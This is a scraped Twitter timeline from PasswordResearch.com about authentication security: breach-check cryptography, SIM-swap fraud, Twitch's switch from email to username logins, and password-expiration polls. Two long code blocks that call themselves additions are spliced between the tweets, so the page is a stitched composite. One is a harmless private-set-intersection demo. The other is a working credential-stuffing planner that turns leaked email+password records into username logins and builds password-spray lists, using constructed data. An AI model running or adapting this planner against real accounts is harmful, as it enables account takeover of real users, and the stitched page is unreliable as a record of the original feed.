PasswordResearch.com
Authentication and password security news gathered by Bruce K. Marshall. See the web site for a collection of password research papers and statistics.
2,622 Tweets · 325 Following · 2,473 Followers
PasswordResearch.com retweeted
Lea Kissner Jun 19
The Google privacy engineering team has just open-sourced something amazing: software for (particular) encrypted computation. It's secure, it's fast enough to power real-world applications like detecting if a username and password have been compromised.
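The check the retweet above describes (is this username+password pair in a breach corpus, without the server ever learning the credential) is usually built on a commutative-encryption private set intersection: each side raises group elements to a secret exponent, and because exponentiation commutes the client can unblind the server's answer and compare it against the server-blinded corpus. The code below is an added illustration written for this page, not code from Google's library. It assumes a toy multiplicative group modulo the Mersenne prime 2^521 - 1 (production systems use elliptic curves), a constructed breach list, a constructed credential encoding, and a 16-bit hash-prefix bucket so the server only returns a small k-anonymity slice of its corpus; all of these are assumptions for the demonstration.

```python
import hashlib
import secrets
from math import gcd

# Assumption: toy group, the multiplicative group mod the Mersenne prime 2**521 - 1.
# Chosen so the example runs with no dependencies; real deployments use EC groups.
P = (1 << 521) - 1
ORDER = P - 1            # order of the multiplicative group mod P
PREFIX_BYTES = 2         # client reveals only the first 16 bits of its credential hash

# Constructed breach corpus (not real data): (username, password) pairs.
BREACHED = [
    ("alice", "hunter2"),
    ("bob", "Password123"),
    ("carol", "letmein!"),
]


def credential_digest(username: str, password: str) -> bytes:
    """Canonical hash of a credential; both sides must use the same encoding (assumed)."""
    data = username.lower().encode() + b"\x00" + password.encode()
    return hashlib.sha256(data).digest()


def hash_to_group(digest: bytes) -> int:
    """Map a digest to a group element other than 0 and 1 (SHA-512 output < P)."""
    h = int.from_bytes(hashlib.sha512(b"group|" + digest).digest(), "big") % P
    return h if h > 1 else 2


def random_exponent() -> int:
    """Random blinding exponent that is invertible modulo the group order."""
    while True:
        k = secrets.randbelow(ORDER - 2) + 2
        if gcd(k, ORDER) == 1:
            return k


class BreachServer:
    """Holds the breach corpus blinded under its secret b; never sees a client credential."""

    def __init__(self, breached):
        self.key = random_exponent()
        self.buckets = {}
        for user, pw in breached:
            d = credential_digest(user, pw)
            elem = pow(hash_to_group(d), self.key, P)      # H(x)^b
            self.buckets.setdefault(d[:PREFIX_BYTES], set()).add(elem)

    def query(self, prefix: bytes, blinded: int):
        """Return (H(q)^a)^b plus the server-blinded entries sharing the hash prefix."""
        double_blinded = pow(blinded, self.key, P)
        return double_blinded, self.buckets.get(prefix, set())


def client_check(server: BreachServer, username: str, password: str) -> bool:
    """True if the credential is in the corpus; the server only sees H(q)^a and a prefix."""
    d = credential_digest(username, password)
    a = random_exponent()
    blinded = pow(hash_to_group(d), a, P)                  # H(q)^a hides q from the server
    double_blinded, bucket = server.query(d[:PREFIX_BYTES], blinded)
    # Unblind: (H(q)^(a*b))^(a^-1 mod ORDER) = H(q)^b, comparable with the bucket entries.
    unblinded = pow(double_blinded, pow(a, -1, ORDER), P)
    return unblinded in bucket


if __name__ == "__main__":
    srv = BreachServer(BREACHED)
    for user, pw in [("alice", "hunter2"), ("alice", "hunter3"), ("dave", "hunter2")]:
        print(user, pw, "->", "compromised" if client_check(srv, user, pw) else "not found")
```

The server learns only a 16-bit prefix and a blinded group element, so it cannot recover the credential; the client learns membership but, because the bucket entries are blinded under the server's key, cannot read the other breached credentials in its bucket.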
PasswordResearch.com retweeted
Steven Murdoch Jun 13
SMS authentication effectively outsources bank security to phone companies, but victims of SIM-swap fraud pay the cost
PasswordResearch.com Jun 13
There may be more in my research paper index that aren't immediately coming to mind.
PasswordResearch.com Jun 13
Back in 2015 Google compared the success rates of their options, and provided some feedback on their respective security. Here's a more recent general comparison that seems decent. And an older one.
PasswordResearch.com Jun 13
Replying to @ShapeSecurity
Also see this comment from Jarrod who works at where they watch the credential stuffing attacks actually happening on the Internet.
PasswordResearch.com Jun 13
Replying to @PwdRsch
But eliminating email address as identity does break from the predominantly monoculture Internet where leaked account data often takes the form of email+password. So you introduce a hurdle, at least until a significant number of the Internet sites make the same change.
PasswordResearch.com Jun 13
Replying to @PwdRsch
Twitch is in a somewhat unique position of usernames being mostly public. So an attacker can harvest usernames of at least the more active users, and possibly map them to matching email address prefixes. Otherwise they have to resort back to just popular password guessing.
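The attacker adaptation described in the tweet above (harvest public usernames, map them to the local part of leaked email addresses, and fall back to popular-password guessing for anyone unmatched) can be shown end to end. The following is an added example written for this page, not code from Twitch, Shape Security or any real credential-stuffing tool; the leaked records, the harvested usernames and the popular-password list are all constructed, and the local-part normalisation rules are assumptions about how an attacker would guess.

```python
import re

# Constructed leak (not real data): email+password records bought from another breach.
# The target site has stopped accepting email addresses at login, so these cannot be
# replayed as-is.
LEAKED_EMAIL_CREDS = [
    ("alice.smith@example.com", "hunter2"),
    ("Bob_Gamer+twitch@example.org", "Password123"),
    ("carol@example.net", "qwerty"),
    ("unknown.person@example.com", "letmein"),
]

# Constructed list of usernames harvested from public chat and stream pages.
PUBLIC_USERNAMES = ["alicesmith", "bob_gamer", "carol", "dave99"]

# Constructed "most common passwords" list used for the fallback spray.
POPULAR_PASSWORDS = ["123456", "password", "qwerty", "12345678"]


def local_part_variants(email: str) -> set:
    """Candidate usernames an attacker derives from an email local part (assumed rules)."""
    local = email.split("@", 1)[0].lower()
    local = local.split("+", 1)[0]                  # drop sub-addressing tags like +twitch
    return {
        local,
        local.replace(".", ""),                     # alice.smith -> alicesmith
        local.replace(".", "_"),                    # alice.smith -> alice_smith
        re.sub(r"[^a-z0-9]", "", local),            # strip everything non-alphanumeric
    }


def adapt_to_username_login(leaked, usernames):
    """Leaked (email, password) pairs rewritten as (username, password) where a mapping exists."""
    index = {u.lower(): u for u in usernames}
    adapted = []
    for email, password in leaked:
        for variant in sorted(local_part_variants(email)):   # sorted: deterministic choice
            if variant in index:
                adapted.append((index[variant], password))
                break
    return adapted


def fallback_spray(usernames, adapted, popular, per_user=2):
    """Popular-password guesses for harvested users that no leaked record maps to."""
    covered = {u for u, _ in adapted}
    return [(u, p) for u in usernames if u not in covered for p in popular[:per_user]]


def attack_plan(leaked, usernames, popular):
    """Full list of login attempts after the username-only change, with coverage stats."""
    adapted = adapt_to_username_login(leaked, usernames)
    spray = fallback_spray(usernames, adapted, popular)
    return {
        "credential_stuffing": adapted,
        "password_spray": spray,
        "leak_records_still_usable": len(adapted),
        "leak_records_total": len(leaked),
    }


if __name__ == "__main__":
    plan = attack_plan(LEAKED_EMAIL_CREDS, PUBLIC_USERNAMES, POPULAR_PASSWORDS)
    print(f"{plan['leak_records_still_usable']}/{plan['leak_records_total']} leaked records still usable")
    for attempt in plan["credential_stuffing"] + plan["password_spray"]:
        print("try", attempt)
```

With email logins allowed, all four leaked records were directly replayable; after the change three of the four still are, because the local parts match harvested public usernames. The control costs the attacker a harvesting step and a normalisation table, not the attack, which is the point made in the thread above.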
PasswordResearch.com Jun 13
Replying to @PwdRsch
I think it does frustrate the script kiddies. If you search for the text Twitch displays about the change, "We have disabled the ability to log in with your email address," you can find at least one hacker forum discussing how to adapt their attacks.
PasswordResearch.com Jun 13
Results from yesterday's poll on whether switching from email address to username is an effective control for preventing account takeover. Looks like most people don't think it is very effective, which I tend to agree with.
PasswordResearch.com Jun 12
Replying to @PwdRsch
What's the difference between "somewhat effective" and "somewhat ineffective" you ask? Well... I, uh... Pass?
PasswordResearch.com Jun 12
Following successful credential stuffing attacks Twitch recently made a change to disallow logins using email addresses instead of usernames. In general, how effective do you believe requiring a username instead of an email is at preventing account takeover attacks?
PasswordResearch.com Jun 11
Enjoyable and well produced podcast from Conor. Sets a high bar for a first episode and I'm looking forward to his upcoming talks with other guests.
PasswordResearch.com Jun 6
Stuart discusses both the pros and cons of using password managers. We often recommend "use a password manager" but should also provide some more of the guidance he offers to improve the user experience with them.
PasswordResearch.com Jun 4
Replying to @ScottJGoldman
I'm not aware of any enterprise password manager that automates the process of setting up account records and generating passwords within the manager software. However, there are some with browser integration that can more gradually prompt users to record and/or change passwords.
PasswordResearch.com Jun 4
Results from the poll about password expiration indicate that most people don't think the control is worth implementing even if you don't have a better solution for preventing account compromises.
PasswordResearch.com Jun 4
Replying to @Philipp_Markert
Yeah, there may be little to no value in many cases. But as with other password practices it's easy to push the requirement onto users and say you've done something. I'm uncertain if it's better than nothing.
PasswordResearch.com Jun 3
Replying to @Philipp_Markert
Password expiration also limits abuse beyond the 90-day window, since some attackers may not obtain the password within that window but after it (e.g. in cases of password reuse when it's exposed elsewhere).
PasswordResearch.com Jun 3
Replying to @Philipp_Markert
It seems (this is where I don't think we have good data) that most attacks are completed within weeks if not days, so password expiration probably helps less in those situations. But we do know that some attackers want to maintain access over months or years.
PasswordResearch.com Jun 3
Replying to @Philipp_Markert
It depends on the attacker's goals and the platform being attacked. If it's a Windows AD then an attacker can probably escalate domain access before the password expires. If it's a web app or other more contained system they may need to continue relying on the initial account.
PasswordResearch.com Jun 3
Since worked on their wordlists a few years ago you could contact him and see if he can help or at least point you to the right person.